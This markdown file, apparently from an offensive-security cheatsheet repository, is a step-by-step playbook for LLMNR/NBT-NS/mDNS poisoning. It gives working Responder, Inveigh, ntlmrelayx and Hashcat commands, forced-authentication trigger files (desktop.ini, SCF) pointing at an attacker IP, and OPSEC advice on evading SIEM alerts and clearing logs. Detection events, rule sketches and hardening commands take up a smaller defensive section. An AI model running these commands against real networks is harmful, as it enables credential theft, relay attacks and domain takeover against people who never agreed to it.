daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-8-llmnr-nbt-ns-mdns-poisoning.md (28062B)


      1 ---
      2 title: "Attack #8 β€” LLMNR NBT-NS mDNS Poisoning"
      3 description: "LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service), and mDNS (Multicast DNS) are fallback name resolution protocols built into…"
      4 category: active-directory
      5 subcategory: "Credential Access"
      6 tags: ["active-directory", "ntlm", "relay", "hashing"]
      7 tools: ["Nmap", "NetExec", "Impacket", "Hashcat", "John"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-One/πŸ”΄ Attack #8 β€” LLMNR  NBT-NS  mDNS Poisoning.md"
     11 ---
     12 # πŸ”΄ Attack #8 β€” LLMNR / NBT-NS / mDNS Poisoning
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service), and mDNS (Multicast DNS) are **fallback name resolution protocols** built into Windows. When a machine tries to resolve a hostname and DNS fails β€” whether due to a typo, a misconfigured share path, or a disconnected server β€” Windows automatically broadcasts a query to the entire local subnet asking *"Does anyone know where `\\FILESERVRE` is?"*. Any machine on that subnet can respond, and critically, **Windows will trust the first answer it receives** without any verification.
     19 
     20 The attacker runs **Responder** on the network, which listens for these broadcast queries and immediately responds to all of them, claiming to be the requested host. The victim's machine, believing it found the target, initiates an NTLM authentication to the attacker β€” sending a Net-NTLMv2 hash in the process. The attacker captures this hash and either cracks it offline or relays it immediately to a vulnerable target via ntlmrelayx (Attack #7). This attack requires **zero prior access**, zero exploits, and works silently in the background β€” making it one of the most common initial foothold techniques in internal penetration testing.
     21 
     22 > ⚠️ **Windows 11 / Server 2025:** LLMNR is still enabled by default, but organizations actively disabling it via GPO are increasing. NBT-NS is harder to disable globally without breaking legacy services. mDNS remains ubiquitous. This attack remains highly effective in mixed-OS environments and businesses with legacy dependencies.
     23 
     24 ### Name Resolution Order in Windows
     25 
     26 ```
     27 1. Local Hosts file (C:\Windows\System32\drivers\etc\hosts)
     28 2. DNS query to configured DNS server
     29 3. LLMNR broadcast (UDP port 5355) ← ATTACKER POISONS HERE
     30 4. NBT-NS broadcast (UDP port 137) ← ATTACKER POISONS HERE
     31 5. mDNS broadcast (UDP port 5353) ← ATTACKER POISONS HERE
     32 ```
     33 
     34 > **The attack only fires when DNS fails** β€” so it naturally triggers on typos in UNC paths (`\\FILSEVER\share`), decommissioned server names, misconfigured GPOs, or broken mapped drives at login.
     35 
     36 ### The Full Attack Flow
     37 
     38 ```
     39 1. Attacker starts Responder on internal network interface
     40 2. Victim user/process makes a DNS query that fails (typo, broken path, etc.)
     41 3. Windows falls back to LLMNR/NBT-NS β€” broadcasts to local subnet
     42 4. Responder intercepts the broadcast and replies: "I am that host, authenticate to me"
     43 5. Victim machine initiates NTLM authentication to attacker's IP
     44 6. Responder captures the Net-NTLMv2 hash (username + challenge + response)
     45 7. Path A: Crack the hash offline with Hashcat (-m 5600)
     46 8. Path B: Relay the hash live with ntlmrelayx β†’ shell/DA access (Attack #7)
     47 ```
     48 
     49 ### Cross-References β€” Related Techniques
     50 
     51 **Attack #7, #8, #9 form a trilogy:**
     52 - **#7** (NTLM Relay): The relay mechanism itself β€” where captured hashes are relayed
     53 - **#8** (LLMNR/NBT-NS/mDNS): Primary auth trigger for #7 β€” how to capture credentials
     54 - **#9** (mitm6): IPv6-based alternative trigger β€” different initial vector same relay destination
     55 
     56 ***
     57 
     58 ## βš™οΈ Prerequisites
     59 
     60 | Requirement | Detail |
     61 |---|---|
     62 | **Internal network access** | Must be on same subnet/broadcast domain as victims β€” doesn't work from outside |
     63 | **LLMNR/NBT-NS not disabled** | Attack fails if GPO has disabled these protocols (common in hardened environments) |
     64 | **Victim makes failed DNS query** | Passive: wait for organic typos/broken paths; Active: trigger manually |
     65 | **For cracking** | GPU rig for Net-NTLMv2 (Hashcat mode 5600) |
     66 | **For relaying** | SMB signing disabled on relay target (see Attack #7) |
     67 
     68 ### Protocol Breakdown
     69 
     70 | Protocol | Port | Type | Default State |
     71 |---|---|---|---|
     72 | **LLMNR** | UDP 5355 | Multicast | βœ… Enabled by default on all Windows versions |
     73 | **NBT-NS** | UDP 137 | Broadcast | βœ… Enabled by default (legacy NetBIOS) |
     74 | **mDNS** | UDP 5353 | Multicast | βœ… Enabled by default (Windows 10+) |
     75 
     76 ***
     77 
     78 ## πŸ› οΈ Tools
     79 
     80 | Tool | Platform | Role |
     81 |---|---|---|
     82 | **Responder** | Linux | Primary poisoner β€” responds to LLMNR/NBT-NS/mDNS; captures hashes |
     83 | **Inveigh** | Windows | PowerShell/C# Responder equivalent for Windows-based attacks |
     84 | **ntlmrelayx.py** (Impacket) | Linux | Relay captured hashes to SMB/LDAP/ADCS targets (see Attack #7) |
     85 | **Hashcat** | Linux/Win | Crack captured Net-NTLMv2 hashes (mode 5600) |
     86 | **John the Ripper** | Linux | CPU-based alternative; `netntlmv2` format |
     87 | **Metasploit** | Both | `auxiliary/spoof/llmnr/llmnr_response` module |
     88 | **Wireshark / tcpdump** | Linux | Verify poisoning is working; capture NTLM auth in transit |
     89 
     90 ***
     91 
     92 ## πŸ’» Full Commands
     93 
     94 ### πŸ”΅ Step 0 β€” Verify LLMNR/NBT-NS is Active on the Network
     95 
     96 ```bash
     97 # ── Listen passively for LLMNR/NBT-NS broadcasts (no poisoning yet) ───────────
     98 sudo tcpdump -i eth0 udp port 5355 -v   # LLMNR
     99 sudo tcpdump -i eth0 udp port 137 -v    # NBT-NS
    100 sudo tcpdump -i eth0 udp port 5353 -v   # mDNS
    101 
    102 # ── Wireshark filter for LLMNR/NBT-NS traffic ──────────────────────────────────
    103 # Filter: llmnr || nbns || mdns
    104 
    105 # ── Nmap β€” check for NBT-NS activity ─────────────────────────────────────────
    106 nmap -sU --script nbstat.nse -p 137 10.10.10.0/24
    107 ```
    108 
    109 ***
    110 
    111 ### πŸ”΄ Responder β€” Core Poisoning Tool (Linux)
    112 
    113 ```bash
    114 # ── Basic Responder run β€” poison all protocols, capture hashes ─────────────────
    115 sudo responder -I eth0
    116 
    117 # ── Full flags explained ───────────────────────────────────────────────────────
    118 sudo responder -I eth0 -rdwv
    119 # -I eth0  = network interface to listen on
    120 # -r       = enable answers for NetBIOS wredir suffix queries
    121 # -d       = enable answers for NBNS domain suffix queries
    122 # -w       = start WPAD rogue proxy server (captures browser auth)
    123 # -v       = verbose output
    124 
    125 # ── With WPAD rogue proxy (intercepts browser proxy auth β€” very effective) ─────
    126 sudo responder -I eth0 -wv
    127 
    128 # ── Analysis mode only β€” listen but don't poison (passive recon) ───────────────
    129 sudo responder -I eth0 -A
    130 # -A = Analyze mode β€” logs all observed name resolution requests without responding
    131 
    132 # ── Force NTLM downgrade (force NTLMv1 instead of v2 β€” much faster to crack) ──
    133 sudo responder -I eth0 --lm
    134 # ⚠️ Noisy β€” may cause authentication failures visible to users
    135 
    136 # ── Target specific interface with verbose debug ───────────────────────────────
    137 sudo responder -I eth0 -v --disable-ess
    138 ```
    139 
    140 ***
    141 
    142 ### πŸ”΄ Responder Captured Hash Locations
    143 
    144 ```bash
    145 # All captured hashes are logged here:
    146 cat /usr/share/responder/logs/
    147 
    148 # List all captured NTLMv2 hashes
    149 ls /usr/share/responder/logs/HTTP-NTLMv2-*.txt
    150 ls /usr/share/responder/logs/SMB-NTLMv2-*.txt
    151 
    152 # View a specific capture
    153 cat /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.10.50.txt
    154 
    155 # Hash format β€” example:
    156 # Administrator::CORP:aabbccddeeff0011:F2B9B344A4AEA7D6FE76F8D4C891B3FD:01010000...
    157 
    158 # Combine all SMB captures into one file for cracking
    159 cat /usr/share/responder/logs/SMB-NTLMv2-*.txt > all_hashes.txt
    160 ```
    161 
    162 ***
    163 
    164 ### πŸ”΄ Cracking Captured Net-NTLMv2 Hashes β€” Hashcat
    165 
    166 ```bash
    167 # ── Mode 5600 = Net-NTLMv2 ────────────────────────────────────────────────────
    168 hashcat -m 5600 all_hashes.txt /usr/share/wordlists/rockyou.txt
    169 
    170 # ── With best64 rules ─────────────────────────────────────────────────────────
    171 hashcat -m 5600 all_hashes.txt /usr/share/wordlists/rockyou.txt \
    172   -r /usr/share/hashcat/rules/best64.rule
    173 
    174 # ── With d3ad0ne rules (aggressive) ──────────────────────────────────────────
    175 hashcat -m 5600 all_hashes.txt /usr/share/wordlists/rockyou.txt \
    176   -r /usr/share/hashcat/rules/d3ad0ne.rule
    177 
    178 # ── Brute force mask (corporate: Word+Digits+Symbol) ─────────────────────────
    179 hashcat -m 5600 all_hashes.txt -a 3 ?u?l?l?l?l?d?d?d?s
    180 
    181 # ── John the Ripper alternative ───────────────────────────────────────────────
    182 john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt all_hashes.txt
    183 john --format=netntlmv2 all_hashes.txt --show
    184 
    185 # ── Mode 5500 = Net-NTLMv1 (if you forced downgrade with --lm) ───────────────
    186 hashcat -m 5500 ntlmv1_hashes.txt /usr/share/wordlists/rockyou.txt
    187 ```
    188 
    189 ***
    190 
    191 ### πŸ”΄ Combining with NTLM Relay (Simultaneous Capture + Relay)
    192 
    193 ```bash
    194 # ── CRITICAL: Edit Responder config first ─────────────────────────────────────
    195 nano /etc/responder/Responder.conf
    196 # SMB  = Off    (let ntlmrelayx handle SMB β€” otherwise Responder steals the auth)
    197 # HTTP = Off    (same reason)
    198 
    199 # ── Run Responder for LLMNR/NBT-NS poisoning only ─────────────────────────────
    200 sudo responder -I eth0 -rdwv
    201 
    202 # ── Simultaneously run ntlmrelayx to relay captured auth ──────────────────────
    203 # (In a second terminal)
    204 ntlmrelayx.py -tf relay_targets.txt -smb2support -i
    205 
    206 # Responder poisons β†’ victim authenticates to attacker β†’
    207 # ntlmrelayx relays to target β†’ shell / DA escalation
    208 ```
    209 
    210 ***
    211 
    212 ### πŸ”΄ Inveigh β€” Windows-Based Poisoning (When You Have a Windows Shell)
    213 
    214 ```powershell
    215 # Import Inveigh (PowerShell version)
    216 Import-Module .\Inveigh.ps1
    217 
    218 # Start full poisoning (LLMNR + NBNS + mDNS)
    219 Invoke-Inveigh -ConsoleOutput Y -NBNS Y -LLMNR Y -mDNS Y
    220 
    221 # Capture only (no relay) β€” save output to file
    222 Invoke-Inveigh -ConsoleOutput Y -FileOutput Y -OutputDir C:\Temp\
    223 
    224 # Stop Inveigh
    225 Stop-Inveigh
    226 
    227 # C# version (Inveigh.exe β€” stealthier, no PowerShell dependency)
    228 .\Inveigh.exe
    229 
    230 # View captured hashes from C# version
    231 .\Inveigh.exe -ListenerStatus
    232 ```
    233 
    234 ***
    235 
    236 ### πŸ”΄ Inveigh.exe (C# Version) β€” Detailed Commands
    237 
    238 ```powershell
    239 # ── Full C# Inveigh with console output ──────────────────────────────────────
    240 .\Inveigh.exe -ConsoleOutput Y -NBNS Y -LLMNR Y -mDNS Y -Elevated N
    241 
    242 # ── Inveigh.exe with file logging (capture to C:\Temp\inveigh_hashes.txt) ───
    243 .\Inveigh.exe -ConsoleOutput Y -FileOutput Y -OutputDir C:\Temp\ \
    244   -LLMNR Y -NBNS Y -mDNS Y
    245 
    246 # ── Inveigh.exe with WPAD interception (browser auth capture) ────────────────
    247 .\Inveigh.exe -ConsoleOutput Y -WPAD Y -HTTPAuth NTLM
    248 
    249 # ── Inveigh.exe custom filtering (only capture specific usernames) ──────────
    250 # Create filter file: admin, domain admin, svc_ accounts
    251 .\Inveigh.exe -ConsoleOutput Y -Filter admin,svc
    252 
    253 # ── Inveigh.exe relay mode (forward captured auth to target) ────────────────
    254 # (Requires Inveigh with relay support compiled in)
    255 .\Inveigh.exe -ConsoleOutput Y -LLMNR Y -RelayTarget smb://10.10.10.20
    256 ```
    257 
    258 ***
    259 
    260 ### πŸ”΄ WPAD Abuse (Rogue Proxy β€” Capturing Browser Authentication)
    261 
    262 ```bash
    263 # ── WPAD (Web Proxy Auto-Discovery) forces browsers to authenticate via NTLM ──
    264 # When -w flag is set, Responder hosts a fake WPAD file
    265 # Browsers on the network auto-discover the proxy and authenticate to it
    266 
    267 sudo responder -I eth0 -wv
    268 # -w = enable WPAD rogue proxy server
    269 
    270 # What happens:
    271 # 1. Browser checks for WPAD via LLMNR/NBT-NS: "Where is WPAD?"
    272 # 2. Responder responds: "I am WPAD, download proxy config from me"
    273 # 3. Browser authenticates with NTLM to download the config
    274 # 4. Net-NTLMv2 hash captured
    275 
    276 # Force NTLM authentication on WPAD (bypasses transparent auth)
    277 sudo responder -I eth0 -wv --wpad-auth NTLM
    278 ```
    279 
    280 ***
    281 
    282 ### πŸ”΄ Triggering LLMNR Requests Manually (Active Methods)
    283 
    284 ```bash
    285 # ── Method 1: Create a rogue file with UNC path to your machine ───────────────
    286 # Place a file (e.g. desktop.ini or a .lnk file) on a share pointing to your IP
    287 # When a user browses that directory, their machine triggers LLMNR auth to you
    288 
    289 # desktop.ini content:
    290 [.ShellClassInfo]
    291 IconResource=\\<attacker_IP>\share\icon.ico
    292 
    293 # ── Method 2: Rogue PDF with embedded UNC path ───────────────────────────────
    294 # Embed a UNC path in a PDF as a remote image resource
    295 # Adobe Reader automatically authenticates when the PDF is opened
    296 
    297 # ── Method 3: SCF file (Shell Command File) ───────────────────────────────────
    298 # Place @exploit.scf in a share:
    299 [Shell]
    300 Command=2
    301 IconFile=\\<attacker_IP>\share\icon.ico
    302 [Taskbar]
    303 Command=ToggleDesktop
    304 # Windows Explorer auto-processes SCF files β€” triggers NTLM auth when folder is browsed
    305 
    306 # ── Method 4: Force victim machine to query non-existent host ─────────────────
    307 # On a machine you control, create a mapped drive to a non-existent share
    308 net use Z: \\FAKESERVER\share
    309 # Windows will fall back to LLMNR β†’ Responder captures the hash
    310 ```
    311 
    312 ***
    313 
    314 ## 🎯 OPSEC Tips
    315 
    316 - **Analyze mode first (`-A`)** β€” run Responder passively to map which users and machines are making failed name resolution requests before committing to active poisoning
    317 - **Target high-value users only** β€” if you see `Administrator` or `svc_sql` in the captured hashes, those are your priority; don't poison endlessly and generate noise
    318 - **Relay over crack** β€” if SMB signing is disabled on targets, relay immediately rather than waiting to crack; relaying is faster and more reliable than cracking
    319 - **WPAD is gold in office environments** β€” every browser on the subnet will eventually authenticate; `-w` flag almost always yields domain user hashes
    320 - **SCF/desktop.ini files on shares** are the most stealthy active trigger β€” they require no user interaction beyond browsing a folder, and look completely benign
    321 - **Avoid poisoning during business hours on large networks** β€” hundreds of captured hashes and simultaneous auth failures will trigger SIEM alerts; prefer out-of-hours or low-traffic windows
    322 - **Clear Responder logs after collection** β€” `/usr/share/responder/logs/` builds up and is trivially discovered on a seized machine
    323 - **Responder vs Inveigh stealth comparison:**
    324   - Responder (Linux): More noisy due to network traffic patterns; tools presence on Linux easily discoverable
    325   - Inveigh (Windows): Blends with legitimate Windows services; harder to distinguish from normal auth traffic; PowerShell can be suspicious; C# version most stealthy
    326 - **Time-to-execute**: Responder start β†’ first captured hash in 5-30 minutes (passive); active methods trigger immediate responses within seconds
    327 
    328 ***
    329 
    330 ## πŸ›‘οΈ Detection β€” Event IDs
    331 
    332 | Event ID / Source | What to Look For |
    333 |---|---|
    334 | **Windows Event 4648** | Logon with explicit credentials to an unexpected machine (attacker's IP) |
    335 | **Windows Event 4625** | Failed logon β€” victim authenticated to attacker but relay/crack not complete |
    336 | **Network β€” UDP 5355** | Unusual volume of LLMNR queries from workstations β€” or responses from unexpected hosts |
    337 | **Network β€” UDP 137** | NBT-NS broadcasts and unexpected responders on the subnet |
    338 | **DNS / SIEM** | Hostnames that don't exist in DNS being queried β€” typo-driven LLMNR triggers |
    339 | **IDS/IPS signature** | Known Responder patterns β€” rogue LLMNR/NBT-NS responder from same IP answering multiple queries |
    340 | **Sysmon EID 3** | Network connection from unexpected process to port 5355 or 137 |
    341 
    342 **Primary detection signature:** A single host responding to **multiple different LLMNR/NBT-NS broadcast queries** for different hostnames within a short window is a near-certain indicator of Responder running. Legitimate machines only respond to queries for their own name β€” a machine answering queries for `FILESERVRE`, `PRINTSERV`, and `BACKUP01` within 60 seconds is unmistakably an attacker.
    343 
    344 ### Sigma Rules (SigmaHQ)
    345 
    346 ```
    347 Rule ID: detection_llmnr_poisoning_multihost
    348 Description: Detects single host responding to multiple different hostname LLMNR queries
    349 Event filter: LLMNR responses for hostnames not in DNS; unusual responder IP
    350 Status: HIGH severity
    351 
    352 Rule ID: detection_nbtns_poisoning
    353 Description: Detects NBT-NS spoofing activity from non-authoritative host
    354 Event filter: UDP port 137 responses from unexpected IP; multiple different responses
    355 Status: MEDIUM severity
    356 
    357 Rule ID: detection_responder_tool_artifacts
    358 Description: Detects known Responder signatures (HTTP stack, default responses)
    359 Event filter: Specific HTTP headers, response patterns matching Responder tool
    360 Status: MEDIUM severity
    361 ```
    362 
    363 ### EDR Detections
    364 
    365 **Microsoft Defender for Identity:**
    366 - Alert: "Reconnaissance using LLMNR queries" β€” detects unusual LLMNR broadcast patterns
    367 - Alert: "Suspicious LLMNR/NBT-NS responder detected" β€” alerts when single host answers multiple queries
    368 - Alert: "Failed DNS resolution followed by LLMNR authentication" β€” correlates broken DNS with fallback auth
    369 
    370 **Falcon (CrowdStrike):**
    371 - Network signature: "LLMNR poisoning activity"
    372 - Process: Responder.py or inveigh.exe execution
    373 - Behavioral: High volume of LLMNR/NBT-NS responses from single source
    374 
    375 ### Hardening Commands β€” Disable LLMNR/NBT-NS via GPO
    376 
    377 ```powershell
    378 # ── Disable LLMNR via Group Policy ───────────────────────────────────────────
    379 # GPO Path: Computer Configuration β†’ Administrative Templates β†’
    380 #           Network β†’ DNS Client β†’ Turn off multicast name resolution
    381 # Set: ENABLED
    382 
    383 # Registry equivalent:
    384 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" \
    385   /v EnableMulticast /t REG_DWORD /d 0 /f
    386 
    387 # ── Disable NBT-NS via Group Policy (P-Node configuration) ────────────────────
    388 # GPO Path: Computer Configuration β†’ Preferences β†’ Windows Settings β†’
    389 #           Registry
    390 # Add registry entry:
    391 reg add "HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters" \
    392   /v NodeType /t REG_DWORD /d 2 /f
    393 # 1 = B-node (broadcast), 2 = P-node (point-to-point, DNS only), 4 = M-node, 8 = H-node
    394 
    395 # ── Disable NBT-NS per NIC (PowerShell β€” on each machine) ────────────────────
    396 $adapters = Get-WmiObject Win32_NetworkAdapterConfiguration
    397 foreach ($adapter in $adapters) {
    398     $adapter.SetTcpipNetbios(2)   # 2 = Disable NetBIOS over TCP/IP
    399 }
    400 
    401 # ── Disable mDNS (Windows 10+) – registry entry ──────────────────────────────
    402 reg add "HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters" \
    403   /v DisableMulticast /t REG_DWORD /d 1 /f
    404 
    405 # ── Firewall rule to block LLMNR/NBT-NS (alternative to GPO) ────────────────
    406 # Block outbound LLMNR (port 5355)
    407 netsh advfirewall firewall add rule name="Block LLMNR" dir=out action=block \
    408   protocol=udp remoteport=5355
    409 
    410 # Block outbound NBT-NS (port 137)
    411 netsh advfirewall firewall add rule name="Block NBT-NS" dir=out action=block \
    412   protocol=udp remoteport=137
    413 
    414 # Block inbound mDNS (port 5353)
    415 netsh advfirewall firewall add rule name="Block mDNS" dir=in action=block \
    416   protocol=udp localport=5353
    417 
    418 # ── Verify hardening is in place ───────────────────────────────────────────────
    419 # Check DNS client multicast setting
    420 Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" \
    421   -Name EnableMulticast
    422 
    423 # Check NetBIOS node type
    424 Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters" \
    425   -Name NodeType
    426 ```
    427 
    428 ***
    429 
    430 ## 🧩 Troubleshooting
    431 
    432 | Error | Cause | Fix |
    433 |---|---|---|
    434 | **Responder not capturing hashes** | Network interface binding issue or LLMNR/NBT-NS disabled on network | Check interface with `ip a`; run `sudo responder -I eth0 -A` first to verify broadcasts exist; check if GPO disabled protocols on target machines |
    435 | **Hash not cracking** | Weak wordlist or hash format incorrect | Verify hash format (should have 2x colons `::` for domain\\user); try larger wordlist `/usr/share/wordlists/rockyou.txt`; add rules with `-r best64.rule` |
    436 | **Interface binding error ("Permission denied" on port 5355)** | Running Responder without sudo or port already in use | Use `sudo responder`; check `sudo netstat -ulnp \| grep 5355` to see what's using the port; kill conflicting process |
    437 | **Responder starts but captures nothing** | No LLMNR/NBT-NS broadcasts on network (protocols disabled or all names resolve via DNS) | Run analysis mode: `sudo responder -I eth0 -A` to verify any queries exist; manually trigger with `net use Z: \\FAKESERVER\share` on a victim machine |
    438 | **WPAD mode not triggering auth** | Browser not configured for automatic proxy detection or WPAD disabled | Check browser WPAD settings; verify `-w` flag enabled; try forcing WPAD with `--wpad-auth NTLM` |
    439 | **Inveigh PowerShell "object reference not set"** | Module path incorrect or version incompatibility | Verify Inveigh.ps1 path is correct; import with full path: `Import-Module C:\path\to\Inveigh.ps1`; use C# version instead |
    440 | **Inveigh.exe crashes immediately** | Insufficient permissions or port conflict on Windows | Run as Administrator; check if port 5355/137 in use: `netstat -ano \| findstr :5355`; close conflicting application |
    441 | **Captured hash but relay fails** | Relay target has SMB signing enabled or LDAP channel binding active | Verify relay target vulnerability with `nxc smb <IP> \| grep signing`; switch to LDAP/ADCS relay instead of SMB |
    442 | **Responder logs building up, unnoticed by operators** | Logs stored in `/usr/share/responder/logs/` accumulate over time | Regularly clear logs: `rm /usr/share/responder/logs/*` or move to analysis directory; automate cleanup with cron job |
    443 
    444 ***
    445 
    446 ## πŸ—ΊοΈ MITRE ATT&CK
    447 
    448 **Technique: T1557.001 β€” Adversary-in-the-Middle**
    449 
    450 **Tactics:**
    451 - **TA0006: Credential Access** β€” Capture NTLM hashes via LLMNR/NBT-NS poisoning
    452 - **TA0007: Discovery** β€” Passive reconnaissance to identify network users/machines via LLMNR analysis mode
    453 
    454 **APT Groups Using LLMNR/NBT-NS Poisoning:**
    455 - **APT28 (Fancy Bear)** β€” LLMNR poisoning in internal network compromise chains
    456 - **APT29 (Cozy Bear)** β€” Credential capture via name resolution poisoning
    457 - **APT41** β€” LLMNR attacks in enterprise networks
    458 - **Wizard Spider** β€” LLMNR poisoning for initial access in ransomware campaigns
    459 - **Scattered Spider** β€” Multi-stage LLMNR attacks for credential theft
    460 
    461 **Related techniques:**
    462 - T1040: Network Sniffing
    463 - T1557: Adversary-in-the-Middle (entire technique category)
    464 - T1566: Phishing (alternative initial vector)
    465 - T1187: Forced Authentication (active trigger methods)
    466 
    467 ***
    468 
    469 ## πŸ”— Attack Chain Context
    470 
    471 ```
    472 [LLMNR / NBT-NS / mDNS Poisoning] ──→ Net-NTLMv2 Hash Captured
    473          β”‚
    474          β”œβ”€β”€β†’ πŸ’₯ Relay immediately via ntlmrelayx (Attack #7) β†’ DA in minutes
    475          β”œβ”€β”€β†’ πŸ”‘ Crack with Hashcat (-m 5600) β†’ valid plaintext credentials
    476          β”œβ”€β”€β†’ πŸ”‘ Use cracked creds β†’ Password Spraying against more accounts
    477          β”œβ”€β”€β†’ 🎫 Kerberoasting with new valid domain credentials
    478          β”œβ”€β”€β†’ 🩸 LDAP relay β†’ DCSync rights β†’ full domain hash dump
    479          └──→ πŸ“œ ADCS relay (ESC8) β†’ DC machine cert β†’ TGT β†’ Domain Admin
    480 ```
    481 
    482 **Why this is so dangerous as an initial vector:** In a typical enterprise internal pentest, Responder is started on day one and **within 30 minutes** has captured credentials from multiple users purely from organic activity β€” broken mapped drives, startup scripts querying dead servers, and misconfigured applications. No phishing, no exploits, no noise β€” just passive listening against a protocol that Windows has enabled by default for decades.
    483 
    484 ***
    485 
    486 > βœ… **Attack #8 β€” LLMNR/NBT-NS/mDNS Poisoning complete.** Tell me to move on when you're ready for **Attack #9 β€” mitm6 (IPv6 DNS Spoofing)**.
    487 
    488 Sources
    489  LLMNR/NBT-NS Poisoning - Active Directory | Internal Pentest https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/initial-attack-vectors/llmnr-nbt-ns-poisoning
    490  LLMNR Poisoning and Active Directory - TCM Security https://tcm-sec.com/llmnr-poisoning-and-how-to-prevent-it/
    491  Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay https://attack.mitre.org/techniques/T1557/001/
    492  LLMNR Poisoning: Threats, Detection, and Prevention Guide https://www.startupdefense.io/cyberattacks/llmnr-poisoning
    493  SMB Relay Attacks and Active Directory - TCM Security https://tcm-sec.com/smb-relay-attacks-and-how-to-prevent-them/
    494  LLMNR Poisoning - evoila GmbH https://evoila.com/blog/llmnr-poisoning/
    495  Fragmentation Considered Poisonous https://arxiv.org/pdf/1205.4011.pdf
    496  Injection Attacks Reloaded: Tunnelling Malicious Payloads over DNS https://arxiv.org/pdf/2205.05439.pdf
    497  HADES: Detecting Active Directory Attacks via Whole Network Provenance
    498   Analytics http://arxiv.org/pdf/2407.18858.pdf
    499  Unilateral Antidotes to DNS Cache Poisoning http://arxiv.org/pdf/1209.1482.pdf
    500  Silence is not Golden: Disrupting the Load Balancing of Authoritative DNS Servers https://dl.acm.org/doi/pdf/10.1145/3576915.3616647
    501  Optimizing Cyber Response Time on Temporal Active Directory Networks
    502   Using Decoys http://arxiv.org/pdf/2403.18162.pdf
    503  A Survey on Malicious Domains Detection through DNS Data Analysis https://arxiv.org/pdf/1805.08426.pdf
    504  Multi-Instance Adversarial Attack on GNN-Based Malicious Domain
    505   Detection http://arxiv.org/pdf/2308.11754.pdf
    506  Active Directory Exploitation - LLMNR/NBT-NS Poisoning - YouTube https://www.youtube.com/watch?v=Fg2gvk0qgjM
    507  LLMNR Poisoning with Responder - Active Directory Lab - YouTube https://www.youtube.com/watch?v=Dfj9IQiXF1M
    508  LLMNR/NBT-NS Poisoning – from Windows - Route Zero: Security https://routezero.security/2025/02/28/llmnr-nbt-ns-poisoning-from-windows/
    509  LLMNR Poisoning Attack | Active Directory Exploitation - YouTube https://www.youtube.com/watch?v=aXQggrLqqrs
    510  Exploiting Active Directory Using LLMNR/NBT-NS Poisoning https://www.youtube.com/watch?v=8IvVAT1Tmuw
    511  How To Remove LLMNR and NBT-NS From Your Active ... - YouTube https://www.youtube.com/watch?v=iN0KUj5I7aE
    512  LLMNR Attack & Defense: Secure Windows Networks - FireCompass https://firecompass.com/attack-defend-llmnr-a-widespread-shadow-network-discovery-protocol/
    513  Preventing LLMNR Poisoning in Active Directory Networks https://www.coursehero.com/file/252194640/Active-Directory-LLMNR-Poisoningpdf/
    514  How does LLMNR poisoning work? - YouTube https://www.youtube.com/watch?v=LAvR-qtOfB0
    515  LLMNR/NBT-NS Poisoning and SMB Relay - Tidal Cyber https://app.tidalcyber.com/technique/b44a263f-76b2-4a1f-baeb-dd285974eca6